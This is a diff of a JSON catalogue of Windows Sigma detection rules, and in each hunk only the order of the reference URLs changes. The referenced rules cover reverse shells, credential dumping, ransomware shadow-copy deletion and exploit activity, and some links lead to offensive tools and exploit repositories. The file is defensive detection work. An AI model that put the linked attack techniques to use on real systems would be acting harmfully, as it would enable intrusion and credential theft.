 "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml"
 ],
 "tags": [
@@ -36828,8 +36852,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
 "https://isc.sans.edu/diary/22264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml"
@@ -36875,8 +36899,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/Hexacorn/status/1420053502554951689",
- "https://twitter.com/SBousseaden/status/1464566846594691073?s=20",
 "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/",
+ "https://twitter.com/SBousseaden/status/1464566846594691073?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml"
 ],
 "tags": [
@@ -36997,9 +37021,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/raspberry-robin/",
 "https://github.com/SigmaHQ/sigma/issues/1009",
 "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/",
+ "https://redcanary.com/blog/raspberry-robin/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml"
 ],
 "tags": [
@@ -37081,8 +37105,8 @@
 "refs": [
 "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters",
 "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
 "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml"
 ],
 "tags": [
@@ -37312,8 +37336,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
 "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
+ "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml"
 ],
 "tags": [
@@ -37387,8 +37411,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit",
 "https://github.com/mandiant/SharPersist",
+ "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml"
 ],
 "tags": [
@@ -37802,8 +37826,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/",
 "https://twitter.com/0gtweet/status/1457676633809330184",
+ "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml"
 ],
 "tags": [
@@ -37871,8 +37895,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
 "https://www.youtube.com/watch?v=ro2QuZTIMBM",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml"
 ],
 "tags": [
@@ -37928,11 +37952,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
 "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml"
 ],
 "tags": [
@@ -38012,8 +38036,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.nirsoft.net/utils/nircmd.html",
- "https://www.nirsoft.net/utils/nircmd2.html#using",
 "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
+ "https://www.nirsoft.net/utils/nircmd2.html#using",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml"
 ],
 "tags": [
@@ -38241,8 +38265,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/harr0ey/status/989617817849876488",
 "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/",
+ "https://twitter.com/harr0ey/status/989617817849876488",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml"
 ],
 "tags": [
@@ -38586,9 +38610,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/binderlabs/DirCreate2System",
- "https://www.echotrail.io/insights/search/wermgr.exe",
 "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
+ "https://www.echotrail.io/insights/search/wermgr.exe",
+ "https://github.com/binderlabs/DirCreate2System",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml"
 ],
 "tags": "No established tags"
@@ -38677,10 +38701,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca",
+ "https://twitter.com/Hexacorn/status/1187143326673330176",
 "https://redcanary.com/blog/raspberry-robin/",
 "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
- "https://twitter.com/Hexacorn/status/1187143326673330176",
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml"
 ],
 "tags": [
@@ -38816,8 +38840,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml"
 ],
@@ -39079,9 +39103,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
- "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
 "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
+ "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml"
 ],
 "tags": [
@@ -39504,8 +39528,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20",
 "https://ss64.com/vb/cscript.html",
+ "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml"
 ],
 "tags": [
@@ -39611,8 +39635,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options",
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml"
 ],
 "tags": [
@@ -39636,9 +39660,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
- "https://www.poweradmin.com/paexec/",
 "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://www.poweradmin.com/paexec/",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml"
 ],
 "tags": [
@@ -39671,8 +39695,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b",
 "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets",
+ "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml"
 ],
 "tags": [
@@ -39705,8 +39729,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1278977301745741825",
 "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/",
+ "https://twitter.com/SBousseaden/status/1278977301745741825",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml"
 ],
 "tags": [
@@ -39772,14 +39796,14 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
- "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://twitter.com/Hexacorn/status/776122138063409152",
 "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://github.com/SigmaHQ/sigma/issues/3742",
+ "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
 "https://twitter.com/gN3mes1s/status/941315826107510784",
 "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
- "https://twitter.com/Hexacorn/status/776122138063409152",
- "https://github.com/SigmaHQ/sigma/issues/3742",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml"
 ],
 "tags": [
@@ -39821,9 +39845,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1",
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
+ "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml"
 ],
 "tags": [
@@ -39890,8 +39914,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml"
 ],
 "tags": [
@@ -39915,9 +39939,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
 "https://www.dfirnotes.net/portproxy_detection/",
 "https://adepts.of0x.cc/netsh-portproxy-code/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml"
 ],
 "tags": [
@@ -39952,8 +39976,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/nao_sec/status/1530196847679401984",
 "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+ "https://twitter.com/nao_sec/status/1530196847679401984",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml"
 ],
 "tags": [
@@ -40117,8 +40141,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1207671369963646976",
 "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/",
+ "https://twitter.com/SBousseaden/status/1207671369963646976",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml"
 ],
 "tags": [
@@ -40206,11 +40230,11 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml",
- "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
- "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set",
- "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A",
- "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
 "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set",
+ "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
+ "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A",
+ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml"
 ],
 "tags": [
@@ -40260,9 +40284,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
 "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml"
 ],
 "tags": [
@@ -40363,8 +40387,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
+ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml"
 ],
 "tags": [
@@ -40390,8 +40414,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/",
- "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/",
 "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml"
 ],
 "tags": [
@@ -40435,8 +40459,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/max_mal_/status/1542461200797163522",
- "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt",
 "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464",
+ "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt",
 "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml"
 ],
@@ -40495,8 +40519,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)",
- "https://ss64.com/nt/dsacls.html",
 "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone",
+ "https://ss64.com/nt/dsacls.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml"
 ],
 "tags": [
@@ -40529,9 +40553,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/h3v0x/CVE-2021-26084_Confluence",
 "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
 "https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
+ "https://github.com/h3v0x/CVE-2021-26084_Confluence",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml"
 ],
 "tags": [
@@ -40640,9 +40664,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA",
 "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html",
 "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/",
+ "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml"
 ],
 "tags": [
@@ -40768,10 +40792,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://youtu.be/5mqid-7zp8k?t=2481",
 "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/",
- "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
 "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
+ "https://youtu.be/5mqid-7zp8k?t=2481",
+ "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml"
 ],
 "tags": [
@@ -40925,9 +40949,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/_felamos/status/1204705548668555264",
- "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/",
+ "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/",
+ "https://twitter.com/_felamos/status/1204705548668555264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml"
 ],
 "tags": [
@@ -40960,8 +40984,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"
 ],
 "tags": [
@@ -41109,8 +41133,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
 "https://www.echotrail.io/insights/search/wusa.exe/",
+ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml"
 ],
 "tags": [
@@ -41199,8 +41223,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/17",
 "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/17",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml"
 ],
 "tags": [
@@ -41358,8 +41382,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
 "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
+ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml"
 ],
 "tags": [
@@ -41472,9 +41496,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/filip_dragovic/status/1590052248260055041",
 "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120",
 "https://twitter.com/filip_dragovic/status/1590104354727436290",
+ "https://twitter.com/filip_dragovic/status/1590052248260055041",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml"
 ],
 "tags": "No established tags"
@@ -41528,9 +41552,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
 "https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/",
 "https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/",
- "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml"
 ],
 "tags": [
@@ -41708,8 +41732,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/ReaQta/status/1222548288731217921",
 "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/",
+ "https://twitter.com/ReaQta/status/1222548288731217921",
 "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html",
 "https://www.activecyber.us/activelabs/windows-uac-bypass",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"
@@ -41745,9 +41769,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/",
- "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a",
 "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/",
+ "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a",
+ "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml"
 ],
 "tags": [
@@ -41843,8 +41867,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/vysecurity/status/977198418354491392",
 "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna",
+ "https://twitter.com/vysecurity/status/977198418354491392",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml"
 ],
 "tags": [
@@ -41878,8 +41902,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks",
 "https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_system.yml"
 ],
 "tags": [
@@ -42021,8 +42045,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "Turla has used fsutil fsinfo drives to list connected drives.",
 "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml",
+ "Turla has used fsutil fsinfo drives to list connected drives.",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml"
 ],
 "tags": [
@@ -42214,15 +42238,15 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
- "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/",
- "https://github.com/Neo23x0/Raccine#the-process",
- "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/",
